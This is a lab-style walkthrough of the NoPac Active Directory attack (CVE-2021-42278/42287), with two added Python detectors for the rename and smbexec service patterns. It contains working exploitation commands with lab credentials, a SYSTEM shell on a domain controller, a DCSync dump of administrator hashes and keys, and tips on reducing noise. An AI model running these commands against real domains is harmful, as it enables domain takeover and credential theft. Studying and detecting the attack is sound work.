NoPAC

1. NoPac

1.1. Introduction

This vulnerability covers two CVEs, 2021-42278 and 2021-42287:

  • 42278: a bypass vulnerability in the Security Account Manager (SAM)
  • 42287: a vulnerability in the Kerberos Privilege Attribute Certificate (PAC) handling of Active Directory

The attack exploits the fact that a computer account's SamAccountName can be changed to the name of a domain controller: the name of a newly added host is changed so that it matches the SamAccountName of an existing domain controller. After the rename, a Kerberos ticket is requested, which causes the service to issue us a ticket in the name of that domain controller rather than the new host's original name. When a TGS is requested, the system issues the ticket whose name matches most closely. More detailed information is available here.
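From the defender's side, the rename described above leaves a clear trail in the Security log: a 4741 event (computer account created) followed by a 4742 event (computer account changed) whose new sAMAccountName has no trailing "$" or collides with a domain controller's name. The following detection logic is an added example and is not part of the original notes or the noPac project; it runs over constructed event records (Python dicts whose keys mirror the SubjectUserName / TargetUserName / SamAccountName fields of the real events, with "-" meaning the attribute did not change) and a constructed list of domain controller names, so it runs offline:

```python
"""Detect the NoPAC sAMAccountName-spoofing pattern in (constructed) Security events.

Added example, not part of the original notes or of noPac. Field names mirror
the 4741 / 4742 EventData layout, but every record below is made up.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed watch-list of domain controller sAMAccountNames without the '$'.
KNOWN_DCS = {"ACADEMY-EA-DC01", "DC01"}

# Constructed sample: a low-privilege user creates a machine account, renames it
# to the DC's name, and renames it back; plus one benign workstation join.
SAMPLE_EVENTS = [
    {"EventID": 4741, "SubjectUserName": "forend", "TargetUserName": "WIN-SCQ6J8QNMEC$",
     "TimeCreated": "2021-12-11T10:00:01"},
    {"EventID": 4742, "SubjectUserName": "forend", "TargetUserName": "WIN-SCQ6J8QNMEC$",
     "SamAccountName": "ACADEMY-EA-DC01", "TimeCreated": "2021-12-11T10:00:02"},
    {"EventID": 4742, "SubjectUserName": "forend", "TargetUserName": "WIN-SCQ6J8QNMEC$",
     "SamAccountName": "WIN-SCQ6J8QNMEC$", "TimeCreated": "2021-12-11T10:00:03"},
    {"EventID": 4741, "SubjectUserName": "svc_join", "TargetUserName": "WS-0042$",
     "TimeCreated": "2021-12-11T10:05:00"},
]


def check_rename(event, known_dcs=KNOWN_DCS):
    """Return a finding for a 4742 event that renames a computer account suspiciously, else None."""
    if event.get("EventID") != 4742:
        return None
    new_name = event.get("SamAccountName", "-")
    if new_name == "-":
        return None  # sAMAccountName was not one of the changed attributes
    finding = {"time": event["TimeCreated"], "actor": event["SubjectUserName"],
               "object": event["TargetUserName"], "new_name": new_name}
    if new_name.rstrip("$").upper() in known_dcs:
        finding["severity"] = "critical"
        finding["reason"] = "computer account renamed to a domain controller name"
    elif not new_name.endswith("$"):
        # Machine accounts always carry a trailing '$'; dropping it is the NoPAC precondition.
        finding["severity"] = "high"
        finding["reason"] = "computer account renamed without trailing '$'"
    else:
        return None
    return finding


def analyze(events, known_dcs=KNOWN_DCS, window=timedelta(minutes=10)):
    """Correlate 4741 creations with later suspicious 4742 renames by the same principal."""
    created = {}  # (subject, target) -> time of the 4741 event
    findings = []
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        ts = datetime.fromisoformat(ev["TimeCreated"])
        if ev["EventID"] == 4741:
            created[(ev["SubjectUserName"], ev["TargetUserName"])] = ts
            continue
        finding = check_rename(ev, known_dcs)
        if finding is None:
            continue
        t0 = created.get((ev["SubjectUserName"], ev["TargetUserName"]))
        finding["created_then_renamed"] = t0 is not None and ts - t0 <= window
        findings.append(finding)
    return findings


def creation_counts(events):
    """Number of computer accounts each principal created (compare against ms-DS-MachineAccountQuota)."""
    counts = defaultdict(int)
    for ev in events:
        if ev["EventID"] == 4741:
            counts[ev["SubjectUserName"]] += 1
    return dict(counts)


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f)
    print(creation_counts(SAMPLE_EVENTS))
```

The rename back to the original name is deliberately not flagged, so the rule fires once per attack rather than twice; the creation counts are what you would compare against ms-DS-MachineAccountQuota to spot ordinary users who add machines at all.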

1.2. Exploitation

https://github.com/Ridter/noPac (this script relies on many Impacket tools to communicate with the DC, so install Impacket first)

git clone https://github.com/Ridter/noPac.git

1.2.1. Enumerating the NoPac vulnerability

Use scanner.py to check whether the vulnerability is present:

┌──(root㉿kali)-[~/Desktop/htb/AWS/noPac]
└─# python scanner.py 'amzcorp.local/jameshauwnnel:654221p!' -dc-ip  10.13.37.15  -use-ldap

███    ██  ██████  ██████   █████   ██████
████   ██ ██    ██ ██   ██ ██   ██ ██
██ ██  ██ ██    ██ ██████  ███████ ██
██  ██ ██ ██    ██ ██      ██   ██ ██
██   ████  ██████  ██      ██   ██  ██████



[*] Current ms-DS-MachineAccountQuota = 10
[*] Got TGT with PAC from 10.13.37.15. Ticket size 1688
[*] Got TGT from 10.13.37.15. Ticket size 1688

If the ms-DS-MachineAccountQuota value is set to 0, the attack may fail, because our user cannot create a new computer account.

┌──(root㉿kali)-[~/Desktop/htb/AWS]
└─# nxc smb 10.13.37.15 -u 'jameshauwnnel' -p '654221p!'  -M  nopac
SMB         10.13.37.15     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:amzcorp.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.13.37.15     445    DC01             [+] amzcorp.local\jameshauwnnel:654221p!
NOPAC       10.13.37.15     445    DC01             TGT with PAC size 1688
NOPAC       10.13.37.15     445    DC01             TGT without PAC size 1688

1.2.2. Getting a shell with NoPac

We can impersonate the built-in Administrator account and launch a semi-interactive shell session on the target domain controller, obtaining a SYSTEM-level shell.
This method is quite noisy, however.

┌─[root@ea-attack01][/opt/noPac]
└──╼ #python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5  -dc-host ACADEMY-EA-DC01 -shell --impersonate administrator -use-ldap

███    ██  ██████  ██████   █████   ██████
████   ██ ██    ██ ██   ██ ██   ██ ██
██ ██  ██ ██    ██ ██████  ███████ ██
██  ██ ██ ██    ██ ██      ██   ██ ██
██   ████  ██████  ██      ██   ██  ██████



[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
[*] will try to impersonat administrator
[*] Adding Computer Account "WIN-SCQ6J8QNMEC$"
[*] MachineAccount "WIN-SCQ6J8QNMEC$" password = YNTtxbldbfsV
[*] Successfully added machine account WIN-SCQ6J8QNMEC$ with password YNTtxbldbfsV.
[*] WIN-SCQ6J8QNMEC$ object = CN=WIN-SCQ6J8QNMEC,CN=Computers,DC=INLANEFREIGHT,DC=LOCAL
[*] WIN-SCQ6J8QNMEC$ sAMAccountName == ACADEMY-EA-DC01
[*] Saving ticket in ACADEMY-EA-DC01.ccache
[*] Resting the machine account to WIN-SCQ6J8QNMEC$
[*] Restored WIN-SCQ6J8QNMEC$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating administrator
[*]     Requesting S4U2self
[*] Saving ticket in administrator.ccache
[*] Remove ccache of ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
[*] Rename ccache with target ...
[*] Attempting to del a computer with the name: WIN-SCQ6J8QNMEC$
[-] Delete computer WIN-SCQ6J8QNMEC$ Failed! Maybe the current user does not have permission.
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system

We can see that a semi-interactive shell session has been established. In the smbexec shell we need to use absolute paths rather than navigating the directory structure with cd.

Looking at the local directory, we can see that noPac.py automatically obtained an Administrator TGT for us:

┌─[root@ea-attack01]─[/opt/noPac]
└──╼ #ls
administrator_ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL.ccache  noPac.py  README.md  requirements.txt  scanner.py  utils

1.2.3. DCSync with NoPac

We can perform a DCSync attack using the built-in Administrator account:

┌─[root@ea-attack01][/opt/noPac]
└──╼ #python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5  -dc-host ACADEMY-EA-DC01 --impersonate administrator -use-ldap -dump -just-dc-user INLANEFREIGHT/administrator

███    ██  ██████  ██████   █████   ██████
████   ██ ██    ██ ██   ██ ██   ██ ██
██ ██  ██ ██    ██ ██████  ███████ ██
██  ██ ██ ██    ██ ██      ██   ██ ██
██   ████  ██████  ██      ██   ██  ██████



[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
[*] will try to impersonat administrator
[*] Alreay have user administrator ticket for target ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
inlanefreight.local\administrator:500:aad3b435b51404eeaad3b435b51404ee:88ad09182de639ccc6579eb0849751cf:::
[*] Kerberos keys grabbed
inlanefreight.local\administrator:aes256-cts-hmac-sha1-96:de0aa78a8b9d622d3495315709ac3cb826d97a318ff4fe597da72905015e27b6
inlanefreight.local\administrator:aes128-cts-hmac-sha1-96:95c30f88301f9fe14ef5a8103b32eb25
inlanefreight.local\administrator:des-cbc-md5:70add6e02f70321f
[*] Cleaning up...

A TGT is also generated and saved in the current local folder.

1.3. Noise and stealth

If low noise is a concern, avoid tools such as smbexec.py wherever possible.

Defender can block this attack. The tool uses smbexec.py to create a service named BTOBTO and then another service named BTOBO; the commands we enter are sent to the target over SMB inside execute.bat. Each time we enter a new command, a new .bat script is generated, echoed into a temporary file, executed, and then deleted from the system.

If we look at Defender's quarantine log, we can see that this behaviour was classified as malicious activity.
(image: Pasted image 20260313121635.png)
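The service-based execution described in this section is also visible to a defender without Defender's quarantine log: every service installation is recorded in the System log as event 7045 (and in the Security log as 4697 when auditing is enabled). The following detection logic is an added example and is not part of the original notes, Impacket or noPac; it scans constructed 7045 records (dicts whose keys mirror the real ServiceName / ImagePath fields) for the indicators the notes mention, the BTOBTO / BTOBO service names and an execute.bat reference, plus the more general shape of a service whose image path echoes a command into a throw-away batch file, runs it and deletes it. The ImagePath values below are constructed to match that description and are not captured from a real system:

```python
"""Flag smbexec-style service installations in (constructed) System log 7045 records.

Added example, not part of the original notes or of Impacket/noPac. Field names
mirror the real 7045 event; every record and image path below is made up.
"""
import re

# Service names the notes attribute to smbexec.py, used here as a constructed watch-list.
SUSPICIOUS_SERVICE_NAMES = {"BTOBTO", "BTOBO"}

# A cmd one-liner that echoes a command into a .bat file, then later deletes something:
# the generic shape of the "write execute.bat, run it, delete it" pattern described above.
_BATCH_DROPPER = re.compile(r"%COMSPEC%.*\becho\b.*>\s*\S+\.bat\b.*\bdel\b", re.IGNORECASE)

SAMPLE_7045 = [
    # constructed: the pattern the notes describe, using the default service name
    {"EventID": 7045, "Computer": "ACADEMY-EA-DC01", "ServiceName": "BTOBTO",
     "ImagePath": r'%COMSPEC% /Q /c echo whoami ^> \\127.0.0.1\C$\__output 2^>^&1 '
                  r'> %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat',
     "AccountName": "LocalSystem"},
    # constructed: a legitimate service installation
    {"EventID": 7045, "Computer": "ACADEMY-EA-DC01", "ServiceName": "Sense",
     "ImagePath": r'"C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe"',
     "AccountName": "LocalSystem"},
    # constructed: renamed service and renamed batch file, same dropper shape
    {"EventID": 7045, "Computer": "WS-0042", "ServiceName": "UpdateSvc",
     "ImagePath": r'%COMSPEC% /Q /c echo net user ^> C:\Windows\Temp\out > C:\Windows\Temp\run.bat '
                  r'& C:\Windows\Temp\run.bat & del C:\Windows\Temp\run.bat',
     "AccountName": "LocalSystem"},
]


def classify_service_install(event, names=SUSPICIOUS_SERVICE_NAMES):
    """Return the list of indicators matched by one 7045 record (empty list = nothing suspicious)."""
    if event.get("EventID") != 7045:
        return []
    hits = []
    if event.get("ServiceName", "").upper() in names:
        hits.append("known smbexec service name")
    image = event.get("ImagePath", "")
    if _BATCH_DROPPER.search(image):
        hits.append("image path writes and executes a temporary batch file")
    if "execute.bat" in image.lower():
        hits.append("references execute.bat")
    return hits


def scan(events):
    """Return (computer, service name, indicators) for every flagged record."""
    flagged = []
    for ev in events:
        hits = classify_service_install(ev)
        if hits:
            flagged.append((ev["Computer"], ev["ServiceName"], hits))
    return flagged


if __name__ == "__main__":
    for computer, name, hits in scan(SAMPLE_7045):
        print(f"{computer}: service {name!r} -> {', '.join(hits)}")
```

The name-based indicators catch the tool's defaults; the regular expression is the part worth keeping, because it still fires when the service and batch file are renamed, as the third sample record shows.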